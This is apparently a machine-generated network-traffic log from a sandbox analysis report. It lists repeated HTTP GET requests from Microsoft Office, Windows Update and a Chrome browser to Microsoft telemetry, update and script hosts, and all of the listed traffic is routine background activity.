              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1ChdEyHYRNkdE3F&MD=2f2hpuyv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: 0x8DCEC757C1AD1D1If-Modified-Since: Mon, 14 Oct 2024 17:27:31 GMT
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: 0x8DCEC757C1AD1D1If-Modified-Since: Mon, 14 Oct 2024 17:27:31 GMT
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1ChdEyHYRNkdE3F&MD=2f2hpuyv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
